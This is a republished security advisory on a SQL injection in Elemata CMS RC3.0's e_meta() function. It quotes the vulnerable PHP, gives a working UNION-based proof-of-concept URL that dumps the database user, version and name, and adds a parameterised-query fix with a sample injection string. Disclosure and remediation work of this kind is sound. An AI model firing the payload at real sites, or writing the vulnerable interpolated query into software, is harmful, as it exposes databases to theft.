Elemata CMS RC3.0 (global.php, id param) SQL Injection and Fix

Source: Internet  Author: Anonymous  Date: 2015-10-19 08:41
# Title                : Elemata CMS RC3.0 SQL Injection
# Vulnerability Author : CWH Underground
# Website              : www.2600.in.th
# Developer URL        : http://www.elemata.com/
# Download Link        : http://jaist.dl.sourceforge.net/project/elematacms/Elemata%203.x/ElemataRC3.0.zip
# Affected Version     : RC 3.0
# Tested on            : Windows and Linux
 
    
##############################
Vulnerability: SQL Injection
##############################
    
/functions/global.php (LINE: 24-30)
    
-----------------------------------------------------------------------------  
function e_meta($id)
{
   include ("Connections/default.php");
   mysql_select_db($database_default, $default);
   $query_meta = "SELECT * FROM posts WHERE id = '$id'";
   $meta = mysql_query($query_meta, $default) or die(mysql_error());
   $row_meta = mysql_fetch_assoc($meta);
-----------------------------------------------------------------------------      
    
#####################################################
SQL Injection Overview
#####################################################
    
With this vulnerability, an attacker might execute arbitrary SQL commands on the database server.
User-tainted data (the id parameter) is used unsanitized when building the database query that is executed on the database management system (DBMS).
An attacker can inject their own SQL syntax and thereby read, insert or delete database entries, or attack the underlying operating system,
depending on the query, DBMS and configuration.
   
POC:
   
http://www.2cto.com /elemata/?id=-1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%28user%28%29,0x3a3a,version%28%29,0x3a3a,database%28%29%29,NULL,NULL,NULL,NULL--+
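
One way to fix the query in e_meta(), shown as an added example (not Elemata's code and not part of the original advisory): validate id as an integer and bind it as a parameter instead of interpolating it into the SQL string. The PDO handle, the in-memory SQLite database, the function name e_meta_safe and the sample rows are assumptions made so that the block runs stand-alone.

```php
<?php
// Added example: hardened counterpart of e_meta() from /functions/global.php.
// Assumptions: a PDO handle replaces Connections/default.php, and an
// in-memory SQLite table stands in for the real MySQL "posts" table.

function e_meta_safe(PDO $db, $id): ?array
{
    // 1. Validate: posts.id is treated as a positive integer.
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject the request without touching the database
    }

    // 2. Bind: the value is sent separately from the SQL text, so quotes
    //    in the input can never change the structure of the statement.
    $stmt = $db->prepare('SELECT * FROM posts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data (only the table and column names come from the advisory).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO posts (id, title) VALUES (1, 'Hello'), (2, 'Draft')");

// Constructed tainted input that closes the quote opened by the query.
$tainted = "-1' OR '1'='1";

// Vulnerable pattern from the advisory: input interpolated into the SQL string.
// The WHERE clause is rewritten by the input and every row is returned.
$leaked = $db->query("SELECT * FROM posts WHERE id = '$tainted'")
             ->fetchAll(PDO::FETCH_ASSOC);
var_dump(count($leaked));

// Hardened function: the same input is rejected, a valid id still works.
var_dump(e_meta_safe($db, $tainted));
var_dump(e_meta_safe($db, '1'));
```

In the real application the PDO handle would point at the MySQL database. The `or die(mysql_error())` call in the original function should also be replaced with server-side logging so that database error text is not returned to the client.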
 

 
